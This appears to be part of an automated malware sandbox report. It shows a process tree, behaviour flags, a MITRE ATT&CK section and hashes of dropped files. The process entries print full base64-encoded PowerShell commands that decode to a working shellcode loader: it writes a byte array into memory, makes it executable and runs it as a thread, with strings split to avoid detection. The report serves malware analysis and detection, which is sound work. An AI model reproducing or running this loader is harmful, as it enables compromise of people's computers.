ALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAIgArACIAZQAiACsAIgByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABGAEwARAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAUwByAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAzADEALAB9AGYAZgAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AMwAxACwAfQBmAGYALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADAALAB9AGEAOAAsAH0AMAAxACwAfQA2ADgALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBiACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAEoAaAA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAQwBRACAALQBOAGEAbQBlACAAIgBPAEMAIgAgAC0AbgBhAG0AZQBzACAAdABKAFEAOwAkAEoAaAA9ACQASgBoAC4AcgBlAHAAbABhAGMAZQAoACIAdABKAFEAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0AGkAbwAiACsAIgBuACIAKwAiAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAUwByACAAPQAgACQAUwByAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBjAHMAWQBkAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAYwBzAFkAZAAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQAZQBuAD0AMAB4ADEAMAAwADIAOwBpAGYAIAAoACQAUwByAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADIAKQB7ACQAZQBuAD0AJABTAHIALgBMAH0AOwAkAEIAdQA9ACQASgBoADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAAyACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABGAEwARAAgAD0AIAAwADsAZgBvAHIAKAAkAEIAcAA9ADAAOwAkAEIAcAAgAC0AbABlACgAJABTAHIALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAQgBwACsAKwApAHsAJABKAGgAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABCAHUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAQgBwACkALAAgACQAUwByAFsAJABCAHAAXQAsACAAMQApAH0AOwAkAEoAaAA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABCAHUALAAgADAAeAAxADAAMAAyACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABGAEwARAApADsAJABsAGUAVwA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJABKAGgAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwB1AGkAbgB0ADMAMgBdAFsAaQBuAHQAXQAwACwAJABsAGUAVwAsACQAQgB1ACwAMAAsADAALAAwACkAOwAnADsAJABHAGgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFEAZwApACkAOwAkAGEAYgA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABTAEYAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAZAB1AE0AIAA9ACAAIgBDADoAXAAkAFMARgBcAHQAdAB3AFgARgBSAE4ASABcACQAUwBGACQAYQBiAFwAdgAxAC4AMABcACQAYQBiACIAOwAkAGQAdQBNACAAPQAgACQAZAB1AE0ALgByAGUAcABsAGEAYwBlACgAIgB0AHQAdwBYACIALAAgACIAcwB5AHMAIgApADsAJABkAHUATQAgAD0AIAAkAGQAdQBNAC4AcgBlAHAAbABhAGMAZQAoACIARgBSAE4ASAAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAEwAVgB2ACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAEwAVgB2ACcAKQB7ACQAYQBiAD0AIAAkAGQAdQBNAH0AOwAkAHcAWgA9ACIAIAAkAGEAYgAgAHUAaABFACAAJABHAGgAIgA7ACQAdwBaAD0AJAB3AFoALgByAGUAcABsAGEAYwBlACgAIgB1AGgARQAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAHcAWgA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -e JABDAFEAPQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawAiACsAIgBlACIAKwAiAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAIgArACIAZQAiACsAIgByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABGAEwARAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAFMAcgA9ACIAfQBlADgALAB9ADgAZgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQA4ADkALAB9AGUANQAsAH0AMwAxACwAfQBkADIALAB9ADYANAAsAH0AOABiACwAfQA1ADIALAB9ADMAMAAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AMwAxACwAfQBmAGYALAB9ADgAYgAsAH0ANwAyACwAfQAyADgALAB9ADAAZgAsAH0AYgA3ACwAfQA0AGEALAB9ADIANgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADQAOQAsAH0ANwA1ACwAfQBlAGYALAB9ADUAMgAsAH0ANQA3ACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADAALAB9ADcAOAAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0ANABjACwAfQAwADEALAB9AGQAMAAsAH0ANQAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOAA1ACwAfQBjADkALAB9ADcANAAsAH0AMwBjACwAfQA0ADkALAB9ADMAMQAsAH0AZgBmACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBjADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9AGEAYwAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANAAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADAALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1ADgALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQA5ACwAfQA4ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AYwAwACwAfQBhADgALAB9ADAAMQAsAH0ANgA4ACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQAxADEALAB9ADUAYgAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYQAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9AGUAOAAsAH0ANgA3ACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZQAsAH0AMwA2ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADMALAB9AGYAOAAsAH0AMAAwACwAfQA3AGQALAB9ADIAOAAsAH0ANQA4ACwAfQA2ADgALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgBhACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQAwAGIALAB9ADIAZgAsAH0AMABmACwAfQAzADAALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADcALAB9ADYAOAAsAH0ANwA1ACwAfQA2AGUALAB9ADQAZAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0ANQBlACwAfQA1AGUALAB9AGYAZgAsAH0AMABjACwAfQAyADQALAB9ADAAZgAsAH0AOAA1ACwAfQA3ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9AGUAOQAsAH0AOQBiACwAfQBmAGYALAB9AGYAZgAsAH0AZgBmACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AYwAxACwAfQBjADMALAB9AGIAYgAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQA2AGEALAB9ADAAMAAsAH0ANQAzACwAfQBmAGYALAB9AGQANQAiADsAJABKAGgAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAEMAUQAgAC0ATgBhAG0AZQAgACIATwBDACIAIAAtAG4AYQBtAGUAcwAgAHQASgBRADsAJABKAGgAPQAkAEoAaAAuAHIAZQBwAGwAYQBjAGUAKAAiAHQASgBRACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AIgArACIAbgAiACsAIgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFMAcgAgAD0AIAAkAFMAcgAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAYwBzAFkAZAB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAGMAcwBZAGQAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAGUAbgA9ADAAeAAxADAAMAAyADsAaQBmACAAKAAkAFMAcgAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAAyACkAewAkAGUAbgA9ACQAUwByAC4ATAB9ADsAJABCAHUAPQAkAEoAaAA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAAMgAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQARgBMAEQAIAA9ACAAMAA7AGYAbwByACgAJABCAHAAPQAwADsAJABCAHAAIAAtAGwAZQAoACQAUwByAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAEIAcAArACsAKQB7ACQASgBoADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAQgB1AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAEIAcAApACwAIAAkAFMAcgBbACQAQgBwAF0ALAAgADEAKQB9ADsAJABKAGgAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAQgB1ACwAIAAwAHgAMQAwADAAMgAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQARgBMAEQAKQA7ACQAbABlAFcAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQASgBoADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAdQBpAG4AdAAzADIAXQBbAGkAbgB0AF0AMAAsACQAbABlAFcALAAkAEIAdQAsADAALAAwACwAMAApADsA
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lwl6j5mi.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:272

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES894E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC894D.tmp"
7⤵
PID:696

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 1004
6⤵
PID:324

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\472F.tmp\4730.tmp\4731.bat

Filesize
9KB

MD5
19e21134e783616aad59551c22579f66

SHA1
3ffc5fd05f63f5324dce7a39c6f13020115bbeff

SHA256
f8108650b352204f19ce39887be2717a0fb3017f34f8950c86f7bdd6a28d7eb8

SHA512
84adcd0cd462473f65155bb16e4144ad462f13c71f944afa0ea8c8dc1b5a4f66d5634af155cd865770bcf498d67046f80945a82aa63e08a9624a38534787fb47

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6CF8.tmp

Filesize
1KB

MD5
4f2287c99071cd4239b97f99da7792b2

SHA1
57efaabaf40a3efa9f5f8f1133ef13d22d1f2c31

SHA256
2fcbca7681de4d7dccb1cb2b723a4cf5b9cb6a25cfed4a1e7cd39a5f7d03400d

SHA512
01e38f62a93c4036f7ff72ee2e568416939c4416ae700e3d38d54aa6f24824e7331e2db5da509e99f364f9521136ffbee74ab3da2ca8e3e6a378633a6c91a312

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES894E.tmp

Filesize
1KB

MD5
12357a67e354a39b9b8dc57514c0d2e7

SHA1
4f9a4663bea6a1846e381b9e403c0764ebc157c3

SHA256
b0f5bb8cac750308434f14270d29cd13aff91f62485b1a9fe7f9471a157413a5

SHA512
4b42e013b533b33c2f5d3124dbdd1026d9cd59a0ee8e482ad1f3d90e3ffe76beeff6c69a6040647eca3534bad68af2781fd2ef91bfe6dea54116fab341270e2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\krnx8_y1.dll

Filesize
3KB

MD5
4d04fa9dcfd95db60da82626c55bd9fb

SHA1
f16012309d0f7db095b57b84d3f79fee20a0bc98

SHA256
31c11348c1e8b4f1e5aef4aee264d8333c73a66b1a28585a98474c25ff6168c0

SHA512
d246dedb373b19376414b6b5a272c310904d11e64ad0b291425ba832518f83e2d9fc4a3963a5af240e3ed307caca368ac33ae56c98db4f11c34247ea9633416d

Download Submit
C:\Users\Admin\AppData\Local\Temp\krnx8_y1.pdb

Filesize
7KB

MD5
4894a08d7f6b95a2ee0de9bf3826d8ff

SHA1
e413a4e48fdbaac9cd598ee369bc2f67ba678128

SHA256
a8f4643ed8242728c5b24540696dc11b52530946460df4619bc183fc8f557196

SHA512
6135c6190b33ef7d00ec5d76c62e95a8b7462fcb8b9918fc415c143a186a9cc13de932ed6a130458737362a46949e244d208e1d76a113695390592b5ae8a9369

Download Submit
C:\Users\Admin\AppData\Local\Temp\lwl6j5mi.dll

Filesize
3KB

MD5
c1a69deca2e6d42fbbd9f30a0d3bfabf

SHA1
cfb8269662ff9ba96f6e523c44d58145e9e83f12

SHA256
1760b930b71c7ec2391220365f3fe8d31897307ea96bfc0fd5a0454fce6ce23a

SHA512
3380482bfcf2286053ebcfb58a74605ed1709ffee48bb0ecb4011a106491c4defa63f2e78e751b42e79d00861386a388977bc46229933387322c6c60740d6020

Download Submit
C:\Users\Admin\AppData\Local\Temp\lwl6j5mi.pdb

Filesize
7KB

MD5
bb695e9eed16ebee4c503bc8af0854be

SHA1
b99c3049017aa82f2bc657a9e9f11d9645250662

SHA256
35a95a38218bbe588487d79286d6b5851250e67f0167657275ab2f5f689b8287

SHA512
889b6c032ccaccb444c7078c48033841ec6d31d1e1ffbaf902e6d3fb6ece5cd9d20a25a7b212e7bc66d62d48b841fa618c2507864dc9a8f5f24c8695af098899

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d0ca6ed42f0d8cc739bb940620a8a29c

SHA1
7d996ac9b10e7a2c3a7a530858a6501d9e074fe7

SHA256
